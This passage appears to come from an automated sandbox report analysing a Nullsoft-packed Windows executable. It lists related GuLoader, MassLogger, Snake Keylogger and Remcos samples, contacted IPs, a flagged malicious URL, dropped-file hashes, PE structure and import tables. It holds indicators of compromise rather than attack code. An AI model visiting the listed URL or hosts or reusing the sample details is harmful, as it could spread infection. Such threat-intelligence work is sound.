                                                                                            JgE2YgxSzB.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                            • 104.21.80.1
                                                                                            lsc5QN46NH.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                            • 104.21.80.1
                                                                                            V7OHj6ISEo.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                            • 104.21.80.1
                                                                                            upXUt2jZ0S.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                            • 104.21.80.1
                                                                                            2CQ2zMn0hb.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                            • 104.21.80.1
                                                                                            6mGpn6kupm.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                            • 104.21.80.1
                                                                                            3b5074b1b5d032e5620f69f9f700ff0e9Yn5tjyOgT.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                            • 149.154.167.220
                                                                                            iRmpdWgpoF.exeGet hashmaliciousUnknownBrowse
                                                                                            • 149.154.167.220
                                                                                            6ZoBPR3isG.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                            • 149.154.167.220
                                                                                            iRmpdWgpoF.exeGet hashmaliciousUnknownBrowse
                                                                                            • 149.154.167.220
                                                                                            3pwbTZtiDu.exeGet hashmaliciousUnknownBrowse
                                                                                            • 149.154.167.220
                                                                                            JgE2YgxSzB.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                            • 149.154.167.220
                                                                                            87J30ulb4q.exeGet hashmaliciousUnknownBrowse
                                                                                            • 149.154.167.220
                                                                                            lsc5QN46NH.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                            • 149.154.167.220
                                                                                            V7OHj6ISEo.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                            • 149.154.167.220
                                                                                            jG8N6WDJOx.exeGet hashmaliciousAgentTeslaBrowse
                                                                                            • 149.154.167.220
                                                                                            37f463bf4616ecd445d4a1937da06e199Yn5tjyOgT.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                            • 142.250.186.142
                                                                                            • 172.217.18.97
                                                                                            6ZoBPR3isG.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                            • 142.250.186.142
                                                                                            • 172.217.18.97
                                                                                            V7OHj6ISEo.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                            • 142.250.186.142
                                                                                            • 172.217.18.97
                                                                                            2CQ2zMn0hb.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                            • 142.250.186.142
                                                                                            • 172.217.18.97
                                                                                            6mGpn6kupm.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                            • 142.250.186.142
                                                                                            • 172.217.18.97
                                                                                            v4nrZtP7K2.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                            • 142.250.186.142
                                                                                            • 172.217.18.97
                                                                                            xXUnP7uCBJ.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                            • 142.250.186.142
                                                                                            • 172.217.18.97
                                                                                            4UQ5wnI389.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                            • 142.250.186.142
                                                                                            • 172.217.18.97
                                                                                            ajRZflJ2ch.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                            • 142.250.186.142
                                                                                            • 172.217.18.97
                                                                                            https://patiooutletmaipu.cl/tiendas/head/Get hashmaliciousLummaC, CAPTCHA Scam ClickFix, LummaC StealerBrowse
                                                                                            • 142.250.186.142
                                                                                            • 172.217.18.97
                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                            C:\Users\user\AppData\Local\Temp\nss456A.tmp\System.dll9Yn5tjyOgT.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                              6ZoBPR3isG.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                V7OHj6ISEo.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                  2CQ2zMn0hb.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                    6mGpn6kupm.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                      v4nrZtP7K2.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                        xXUnP7uCBJ.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                          4UQ5wnI389.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                            ajRZflJ2ch.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                              DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exeGet hashmaliciousRemcosBrowse
                                                                                                                Process:C:\Users\user\Desktop\b5BQbAhwVD.exe
                                                                                                                File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 300x300, segment length 16, baseline, precision 8, 2560x2560, components 3
                                                                                                                Category:dropped
                                                                                                                Size (bytes):484658
                                                                                                                Entropy (8bit):7.809711763657168
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:12288:W1S3xo63wl4biprI2S4WwWEcwxg9dvVAxZOCLF0DB:Wo3xX3y4bz2lWwWo6rSTZyd
                                                                                                                MD5:5C727AE28F0DECF497FBB092BAE01B4E
                                                                                                                SHA1:AADE364AE8C2C91C6F59F85711B53078FB0763B7
                                                                                                                SHA-256:77CCACF58330509839E17A6CFD6B17FE3DE31577D8E2C37DC413839BA2FEEC80
                                                                                                                SHA-512:5246C0FBA41DF66AF89D986A3CEABC99B61DB9E9C217B28B2EC18AF31E3ED17C865387223CEB3A38A804243CF3307E07E557549026F49F52829BEBC4D4546C40
                                                                                                                Malicious:false
                                                                                                                Reputation:moderate, very likely benign file
                                                                                                                Preview:......JFIF.....,.,.....]http://ns.adobe.com/xap/1.0/.<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 7.2-c000 79.566ebc5, 2022/05/09-07:22:29 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:photoshop="http://ns.adobe.com/photoshop/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stEvt="http://ns.adobe.com/xap/1.0/sType/ResourceEvent#" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:tiff="http://ns.adobe.com/tiff/1.0/" xmlns:exif="http://ns.adobe.com/exif/1.0/" xmp:CreatorTool="Adobe Photoshop CC 2018 (Windows)" xmp:CreateDate="2018-04-27T15:00:27+08:00" xmp:ModifyDate="2022-09-22T14:01:54+08:00" xmp:MetadataDate="2022-09-22T14:01:54+08:00" dc:format="image/png" photoshop:ColorMode="3" xmpMM:InstanceID="xmp.iid:b728d5c8-8822-6d4c-afc1-a393cb2a04ec"
                                                                                                                Process:C:\Users\user\Desktop\b5BQbAhwVD.exe
                                                                                                                File Type:data
                                                                                                                Category:dropped
                                                                                                                Size (bytes):138650
                                                                                                                Entropy (8bit):4.602674644849829
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:1536:8CApqNR0FvvIUnCd76hp6viXqSSi9/Apc+ehgIyEIvLb0zrWalq6c1P3ZKGpQ:8BpoRxUK6f6JSSSYpc+eeIyRvEI6GprQ
                                                                                                                MD5:CCA2743B86AE89D56AD2E254CA8A76A7
                                                                                                                SHA1:1AFED5654E8BA2EF041B5F96414C23E8FF980734
                                                                                                                SHA-256:0ED1033765AFFF1C36508DC20CFF1275331E43D976088C4F61AFACF4B9D5B20F
                                                                                                                SHA-512:DE337776ECEF97887253E0F8162071AA2BB7637697E105A89FE3945173B57997D87EBE89E246B3BE8B1DB4A77E36F142D3178D219C60AD3EAC061AC206EDCD12
                                                                                                                Malicious:false
                                                                                                                Reputation:low
                                                                                                                Preview:..........EE.zzzz..rr....v........cc........................uu....-..........mmm.......:...####...............>>>.........JJ.........................X...............................................ee.W.............{{...g.W....................................2...]............e...........MM.... ....../.....M....6.......................................N..n............zz......II..........................o.**......`.......................WWW........w..Y.......................a.11.4..zz....BB.=..................................LL.....4...[...ZZZZ..)....................j..*.............U................ddd.G.........................\\......AA.......................<.........111....[.................S........WWWW.......]].....................yy.....'.HH................6........~...........zz.......pppp....................x.......CCC.***.::::..<..yyy...................AAAA...........................i.........1.....XX............p....................?.....i.....>>..H......wwwww.....6.......m..!
                                                                                                                Process:C:\Users\user\Desktop\b5BQbAhwVD.exe
                                                                                                                File Type:data
                                                                                                                Category:dropped
                                                                                                                Size (bytes):287758
                                                                                                                Entropy (8bit):7.7555939328893375
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:6144:Le4P2YlxxNXjisHuCoaNnzlAGq0Xbsm4KZFSieck:Cyxni4ZoaNnzln1C2q7
                                                                                                                MD5:4D03315C42C65B6FD5FE3F331943B973
                                                                                                                SHA1:DA48A3D5A3AC5653209C23076837F6B45882C334
                                                                                                                SHA-256:8F179C1D3BF015C6213EC4B61A3EA198041E090A4681AA794A76365259C24968
                                                                                                                SHA-512:72A0F77C334C02F7C4EC3AD67D5A6B62DE3032B22B9175292513B33DB4F7B555E8B40916C29FD2C0B65BF05A354791DAF1A3B3D03E9F9A957568C62352BC72B0
                                                                                                                Malicious:false
                                                                                                                Reputation:low
                                                                                                                Preview:....||............S....r....B..............bb...............................@."..................................11.............N.......*.............-..........x.K.~...G.............ZZ......xx..........2.........pp.............?...........y.i...&&&&.......EEE...111..!!.....:::::::.....??....HH................x.ppp.D.%%.....................T...........bb.///.......{.mmm...HH..+....m...........#.....$......^^^..............aaaa........................1..............D......... ...............................r.K........................\\\\................11............``.........++....................//..........RR.............RR.9............G.$............E............o............{{{..#..y.LL........,.........~~~......L.......f.......................9.t...........:::...................i.....`....................%...................................^.J....../..SS...LLL........................................L............7...........G.KKKKKKK...............j...............................
                                                                                                                Process:C:\Users\user\Desktop\b5BQbAhwVD.exe
                                                                                                                File Type:data
                                                                                                                Category:dropped
                                                                                                                Size (bytes):112291
                                                                                                                Entropy (8bit):1.249420131631438
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:768:5R+BCpkJWjYWL2MxTVLvUjpGqik9JiAfWA2DBQwD1PzUH+HYZmIo7x31sT:WCZY21w0I2NZYD
                                                                                                                MD5:4D1D72CFC5940B09DFBD7B65916F532E
                                                                                                                SHA1:30A45798B534842002B103A36A3B907063F8A96C
                                                                                                                SHA-256:479F1904096978F1011DF05D52021FAEEE028D4CF331024C965CED8AF1C8D496
                                                                                                                SHA-512:048844A09E291903450188715BCDDF14F0F1F10BEAFBD005882EBF5D5E31A71D8F93EEBE788BD54B4AED2266C454F4DCA18AF4567977B7E773BBE29A38DEA45B
                                                                                                                Malicious:false
                                                                                                                Reputation:moderate, very likely benign file
                                                                                                                Preview:..........P............+......................................................................................................................X......n..(................G...................................m.........|.......................U.............`............l..............@}.........a........................................s............y.................N...............B...............w.e..........................................Q......*...................................................................................................a...........................f..................p..................t...........................................9.Q................@....................e................................................................:..............P.......S.........................P........................9..............._.......................(...............N............................................................H.T..........c..............................
                                                                                                                Process:C:\Users\user\Desktop\b5BQbAhwVD.exe
                                                                                                                File Type:data
                                                                                                                Category:dropped
                                                                                                                Size (bytes):362089
                                                                                                                Entropy (8bit):1.23992084267325
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:768:xOeaameETrlE0+1mGOWb3h5WAV0hW+JSLSwzj2HlSdL0f6mhKZRaqOzWz6szt3cA:x+ds5dYOVxIW3hhdeRt6MeZ1W4vB
                                                                                                                MD5:A4340182CDDD2EC1F1480360218343F9
                                                                                                                SHA1:50EF929FEA713AA6FCC05E8B75F497B7946B285B
                                                                                                                SHA-256:B91E5B1FF5756F0B93DCF11CBC8B467CDA0C5792DE24D27EC86E7C74388B44B3
                                                                                                                SHA-512:021F198AFF7CCED92912C74FC97D1919A9E059F22E99AB1236FBAA36C16B520C07B78F47FC01FCFAC1B53A87CDAE3E440D0589FA2844612617FAB2EDB64A3573
                                                                                                                Malicious:false
                                                                                                                Reputation:moderate, very likely benign file
                                                                                                                Preview:..........F.............................i.....................B.........................................b..Et.............................O...........h...............................................................................8..........n.....................w.................../.......|.......'........,..........(...........................W......#..................................................................................................=..........................]..........q................................................[.................2....S............................"...................................$!..............................=.......................................[f.................................................................................................................V.............................w...................................................$.............................................................j...........h.............J..............
                                                                                                                Process:C:\Users\user\Desktop\b5BQbAhwVD.exe
                                                                                                                File Type:FoxPro FPT, blocks size 22, next free block index 285212672, field type 0
                                                                                                                Category:dropped
                                                                                                                Size (bytes):139354
                                                                                                                Entropy (8bit):1.2473328695625903
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:768:9OsMSh8lSnJGyUzWZsO2ipzPFmDZC9kpzroto48tf2+5lVp:9delFlqNawgJp
                                                                                                                MD5:B0FB6B583D6902DE58E1202D12BA4832
                                                                                                                SHA1:7F585B5C3A4581CE76E373C78A6513F157B20480
                                                                                                                SHA-256:E6EA5F6D0C7F5FA407269C7F4FF6D97149B7611071BF5BF6C454B810501AE661
                                                                                                                SHA-512:E0894FFBD76C3476DC083DAFD24F88964BF6E09E4CA955766B43FE73A764A00247C930E9996652A22B57B27826CD94F88B8178514060CA398DE568675F9E4571
                                                                                                                Malicious:false
                                                                                                                Preview:.......................................|...................................................................+................$......&....A........................................................Z.....................................A...............!.....Y........................l..........9..................c.............f.................F...".................................................h.......................................\..............J............................5......t.....E.................q........................:......^....................................................................................I..........................................................x......W....................................................................................M...........................X..............................,..................m.......................................................................................................................J........ ...F...........
                                                                                                                Process:C:\Users\user\Desktop\b5BQbAhwVD.exe
                                                                                                                File Type:data
                                                                                                                Category:dropped
                                                                                                                Size (bytes):1550943
                                                                                                                Entropy (8bit):5.45998716754557
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:24576:vHypJZhzpo2Zo3xX3y4bz2lWwWo6rSTZyO:PypJZ/poBXbz2luo6rS1yO
                                                                                                                MD5:ECBE36029FAC4F13BBC57210B7B90A2D
                                                                                                                SHA1:1AF9CECB1F869FB477488FAE8133791EE5A8B2EA
                                                                                                                SHA-256:C537A2B264C0180628325C3CC4E6ADCDAEF9DCBE8BC3A19E19CC2EAEEC6A65D2
                                                                                                                SHA-512:64EAB064591405C204D4D6899604A10CD9C718AA281F8807CA9286D828BE0908FCFAB4FAD8CECBB2C28F0495D98F3A2AAB99924CBDCC823342345BB766DB6DA2
                                                                                                                Malicious:false
                                                                                                                Preview:.5......,.......,.......\........!.......4.......5..........................M...i............................H..............................................................................................................................................................................G...J...........t...h...............................................................g...............................................................j.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                Process:C:\Users\user\Desktop\b5BQbAhwVD.exe
                                                                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                Category:dropped
                                                                                                                Size (bytes):12288
                                                                                                                Entropy (8bit):5.719859767584478
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:192:1enY0LWelt70elWjvfstJcVtwtYbjnIOg5AaDnbC7ypXhtIj:18PJlt70esj0Mt9vn6ay6
                                                                                                                MD5:0D7AD4F45DC6F5AA87F606D0331C6901
                                                                                                                SHA1:48DF0911F0484CBE2A8CDD5362140B63C41EE457
                                                                                                                SHA-256:3EB38AE99653A7DBC724132EE240F6E5C4AF4BFE7C01D31D23FAF373F9F2EACA
                                                                                                                SHA-512:C07DE7308CB54205E8BD703001A7FE4FD7796C9AC1B4BB330C77C872BF712B093645F40B80CE7127531FE6746A5B66E18EA073AB6A644934ABED9BB64126FEA9
                                                                                                                Malicious:false
                                                                                                                Antivirus:
                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                Joe Sandbox View:
                                                                                                                • Filename: 9Yn5tjyOgT.exe, Detection: malicious, Browse
                                                                                                                • Filename: 6ZoBPR3isG.exe, Detection: malicious, Browse
                                                                                                                • Filename: V7OHj6ISEo.exe, Detection: malicious, Browse
                                                                                                                • Filename: 2CQ2zMn0hb.exe, Detection: malicious, Browse
                                                                                                                • Filename: 6mGpn6kupm.exe, Detection: malicious, Browse
                                                                                                                • Filename: v4nrZtP7K2.exe, Detection: malicious, Browse
                                                                                                                • Filename: xXUnP7uCBJ.exe, Detection: malicious, Browse
                                                                                                                • Filename: 4UQ5wnI389.exe, Detection: malicious, Browse
                                                                                                                • Filename: ajRZflJ2ch.exe, Detection: malicious, Browse
                                                                                                                • Filename: DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exe, Detection: malicious, Browse
                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......qr*.5.D.5.D.5.D...J.2.D.5.E.!.D.....2.D.a0t.1.D.V1n.4.D..3@.4.D.Rich5.D.........PE..L....~.\...........!....."...........).......@...............................p............@..........................B.......@..P............................`.......................................................@..X............................text.... .......".................. ..`.rdata..c....@.......&..............@..@.data...x....P.......*..............@....reloc.......`.......,..............@..B................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                                                                Entropy (8bit):7.961501480254122
                                                                                                                TrID:
                                                                                                                • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                • DOS Executable Generic (2002/1) 0.02%
                                                                                                                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                File name:b5BQbAhwVD.exe
                                                                                                                File size:1'050'481 bytes
                                                                                                                MD5:8e4a2b26b311d9e5c9a920186b0b8025
                                                                                                                SHA1:f433a5c5020d31b0278b659e01cbb3882c671487
                                                                                                                SHA256:d314fe716123c0fac98d48d7d4acd4fe887217c2a9ad0fc96850235785f7f79b
                                                                                                                SHA512:06d922de26bf2808e740ae9c0d282c13dac4f4aa42e22458089f08b3297661ef2aefe16c0099bd1393fe5d443a10b1f425acf1fb2597ff63d31bbb37e76c613a
                                                                                                                SSDEEP:24576:9jwKCNPYCP4T85MgzoEHzizaMr+GGU8HgpIw8hadmA:V1CSgSYoEOzJiGd+gpH8hadt
                                                                                                                TLSH:EF25334931E2E9A2D7E38AF99629CCD777DBAD031420F15313B4352A9C3971F8A1B258
                                                                                                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1...Pf..Pf..Pf.*_9..Pf..Pg.LPf.*_;..Pf..sV..Pf..V`..Pf.Rich.Pf.........................PE..L...$..\.................f...*.....
                                                                                                                Icon Hash:46224e4c19391d03
                                                                                                                Entrypoint:0x4034a5
                                                                                                                Entrypoint Section:.text
                                                                                                                Digitally signed:false
                                                                                                                Imagebase:0x400000
                                                                                                                Subsystem:windows gui
                                                                                                                Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                                                                                DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                                                Time Stamp:0x5C157F24 [Sat Dec 15 22:24:36 2018 UTC]
                                                                                                                TLS Callbacks:
                                                                                                                CLR (.Net) Version:
                                                                                                                OS Version Major:4
                                                                                                                OS Version Minor:0
                                                                                                                File Version Major:4
                                                                                                                File Version Minor:0
                                                                                                                Subsystem Version Major:4
                                                                                                                Subsystem Version Minor:0
                                                                                                                Import Hash:1f23f452093b5c1ff091a2f9fb4fa3e9
                                                                                                                Instruction
                                                                                                                sub esp, 000002D4h
                                                                                                                push ebx
                                                                                                                push esi
                                                                                                                push edi
                                                                                                                push 00000020h
                                                                                                                pop edi
                                                                                                                xor ebx, ebx
                                                                                                                push 00008001h
                                                                                                                mov dword ptr [esp+14h], ebx
                                                                                                                mov dword ptr [esp+10h], 0040A230h
                                                                                                                mov dword ptr [esp+1Ch], ebx
                                                                                                                call dword ptr [004080ACh]
                                                                                                                call dword ptr [004080A8h]
                                                                                                                and eax, BFFFFFFFh
                                                                                                                cmp ax, 00000006h
                                                                                                                mov dword ptr [0042A24Ch], eax
                                                                                                                je 00007F8D6CD0F8F3h
                                                                                                                push ebx
                                                                                                                call 00007F8D6CD12BBDh
                                                                                                                cmp eax, ebx
                                                                                                                je 00007F8D6CD0F8E9h
                                                                                                                push 00000C00h
                                                                                                                call eax
                                                                                                                mov esi, 004082B0h
                                                                                                                push esi
                                                                                                                call 00007F8D6CD12B37h
                                                                                                                push esi
                                                                                                                call dword ptr [00408150h]
                                                                                                                lea esi, dword ptr [esi+eax+01h]
                                                                                                                cmp byte ptr [esi], 00000000h
                                                                                                                jne 00007F8D6CD0F8CCh
                                                                                                                push 0000000Ah
                                                                                                                call 00007F8D6CD12B90h
                                                                                                                push 00000008h
                                                                                                                call 00007F8D6CD12B89h
                                                                                                                push 00000006h
                                                                                                                mov dword ptr [0042A244h], eax
                                                                                                                call 00007F8D6CD12B7Dh
                                                                                                                cmp eax, ebx
                                                                                                                je 00007F8D6CD0F8F1h
                                                                                                                push 0000001Eh
                                                                                                                call eax
                                                                                                                test eax, eax
                                                                                                                je 00007F8D6CD0F8E9h
                                                                                                                or byte ptr [0042A24Fh], 00000040h
                                                                                                                push ebp
                                                                                                                call dword ptr [00408044h]
                                                                                                                push ebx
                                                                                                                call dword ptr [004082A0h]
                                                                                                                mov dword ptr [0042A318h], eax
                                                                                                                push ebx
                                                                                                                lea eax, dword ptr [esp+34h]
                                                                                                                push 000002B4h
                                                                                                                push eax
                                                                                                                push ebx
                                                                                                                push 004216E8h
                                                                                                                call dword ptr [00408188h]
                                                                                                                push 0040A384h
                                                                                                                Programming Language:
                                                                                                                • [EXP] VC++ 6.0 SP5 build 8804
                                                                                                                NameVirtual AddressVirtual Size Is in Section
                                                                                                                IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                IMAGE_DIRECTORY_ENTRY_IMPORT0x85040xa0.rdata
                                                                                                                IMAGE_DIRECTORY_ENTRY_RESOURCE0x550000x21068.rsrc
                                                                                                                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                                                                IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                IMAGE_DIRECTORY_ENTRY_IAT0x80000x2b0.rdata
                                                                                                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                                                NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                .text0x10000x64090x6600bfe2b726d49cbd922b87bad5eea65e61False0.6540287990196079data6.416186322230332IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                .rdata0x80000x13960x1400d45dcba8ca646543f7e339e20089687eFalse0.45234375data5.154907432640367IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                .data0xa0000x203580x6008575fc5e872ca789611c386779287649False0.5026041666666666data4.004402321344153IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                .ndata0x2b0000x2a0000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                .rsrc0x550000x210680x2120003ed2ed76ba15352dac9e48819696134False0.8714696344339623data7.556190648348207IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                RT_BITMAP0x554c00x368Device independent bitmap graphic, 96 x 16 x 4, image size 768EnglishUnited States0.23623853211009174
                                                                                                                RT_ICON0x558280xc2a3PNG image data, 256 x 256, 8-bit/color RGBA, non-interlacedEnglishUnited States0.9966684729162903
                                                                                                                RT_ICON0x61ad00x86e0PNG image data, 256 x 256, 8-bit/color RGBA, non-interlacedEnglishUnited States0.990210843373494
                                                                                                                RT_ICON0x6a1b00x5085PNG image data, 256 x 256, 8-bit/color RGBA, non-interlacedEnglishUnited States0.9867559307233299
                                                                                                                RT_ICON0x6f2380x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600EnglishUnited States0.4358921161825726
                                                                                                                RT_ICON0x717e00x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224EnglishUnited States0.4896810506566604
                                                                                                                RT_ICON0x728880xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colorsEnglishUnited States0.5367803837953091
                                                                                                                RT_ICON0x737300x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colorsEnglishUnited States0.6913357400722022
                                                                                                                RT_ICON0x73fd80x668Device independent bitmap graphic, 48 x 96 x 4, image size 1152EnglishUnited States0.38597560975609757
                                                                                                                RT_ICON0x746400x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colorsEnglishUnited States0.4934971098265896
                                                                                                                RT_ICON0x74ba80x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088EnglishUnited States0.651595744680851
                                                                                                                RT_ICON0x750100x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 512EnglishUnited States0.46908602150537637
                                                                                                                RT_ICON0x752f80x128Device independent bitmap graphic, 16 x 32 x 4, image size 128EnglishUnited States0.5472972972972973
                                                                                                                RT_DIALOG0x754200x120dataEnglishUnited States0.53125
                                                                                                                RT_DIALOG0x755400x118dataEnglishUnited States0.5678571428571428
                                                                                                                RT_DIALOG0x756580x120dataEnglishUnited States0.5104166666666666
                                                                                                                RT_DIALOG0x757780xf8dataEnglishUnited States0.6330645161290323
                                                                                                                RT_DIALOG0x758700xa0dataEnglishUnited States0.6125
                                                                                                                RT_DIALOG0x759100x60dataEnglishUnited States0.7291666666666666
                                                                                                                RT_GROUP_ICON0x759700xaedataEnglishUnited States0.6091954022988506
                                                                                                                RT_VERSION0x75a200x308dataEnglishUnited States0.47036082474226804
                                                                                                                RT_MANIFEST0x75d280x33eXML 1.0 document, ASCII text, with very long lines (830), with no line terminatorsEnglishUnited States0.5542168674698795
                                                                                                                DLLImport
                                                                                                                KERNEL32.dllExitProcess, SetFileAttributesW, Sleep, GetTickCount, CreateFileW, GetFileSize, GetModuleFileNameW, GetCurrentProcess, SetCurrentDirectoryW, GetFileAttributesW, SetEnvironmentVariableW, GetWindowsDirectoryW, GetTempPathW, GetCommandLineW, GetVersion, SetErrorMode, lstrlenW, lstrcpynW, CopyFileW, GetShortPathNameW, GlobalLock, CreateThread, GetLastError, CreateDirectoryW, CreateProcessW, RemoveDirectoryW, lstrcmpiA, GetTempFileNameW, WriteFile, lstrcpyA, MoveFileExW, lstrcatW, GetSystemDirectoryW, GetProcAddress, GetModuleHandleA, GetExitCodeProcess, WaitForSingleObject, lstrcmpiW, MoveFileW, GetFullPathNameW, SetFileTime, SearchPathW, CompareFileTime, lstrcmpW, CloseHandle, ExpandEnvironmentStringsW, GlobalFree, GlobalUnlock, GetDiskFreeSpaceW, GlobalAlloc, FindFirstFileW, FindNextFileW, DeleteFileW, SetFilePointer, ReadFile, FindClose, lstrlenA, MulDiv, MultiByteToWideChar, WideCharToMultiByte, GetPrivateProfileStringW, WritePrivateProfileStringW, FreeLibrary, LoadLibraryExW, GetModuleHandleW
                                                                                                                USER32.dllGetSystemMenu, SetClassLongW, EnableMenuItem, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongW, SetCursor, LoadCursorW, CheckDlgButton, GetMessagePos, LoadBitmapW, CallWindowProcW, IsWindowVisible, CloseClipboard, SetClipboardData, EmptyClipboard, OpenClipboard, ScreenToClient, GetWindowRect, GetDlgItem, GetSystemMetrics, SetDlgItemTextW, GetDlgItemTextW, MessageBoxIndirectW, CharPrevW, CharNextA, wsprintfA, DispatchMessageW, PeekMessageW, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, GetClientRect, FillRect, DrawTextW, EndDialog, RegisterClassW, SystemParametersInfoW, CreateWindowExW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, GetDC, SetTimer, SetWindowTextW, LoadImageW, SetForegroundWindow, ShowWindow, IsWindow, SetWindowLongW, FindWindowExW, TrackPopupMenu, AppendMenuW, CreatePopupMenu, EndPaint, CreateDialogParamW, SendMessageTimeoutW, wsprintfW, PostQuitMessage
                                                                                                                GDI32.dllSelectObject, SetBkMode, CreateFontIndirectW, SetTextColor, DeleteObject, GetDeviceCaps, CreateBrushIndirect, SetBkColor
                                                                                                                SHELL32.dllSHGetSpecialFolderLocation, ShellExecuteExW, SHGetPathFromIDListW, SHBrowseForFolderW, SHGetFileInfoW, SHFileOperationW
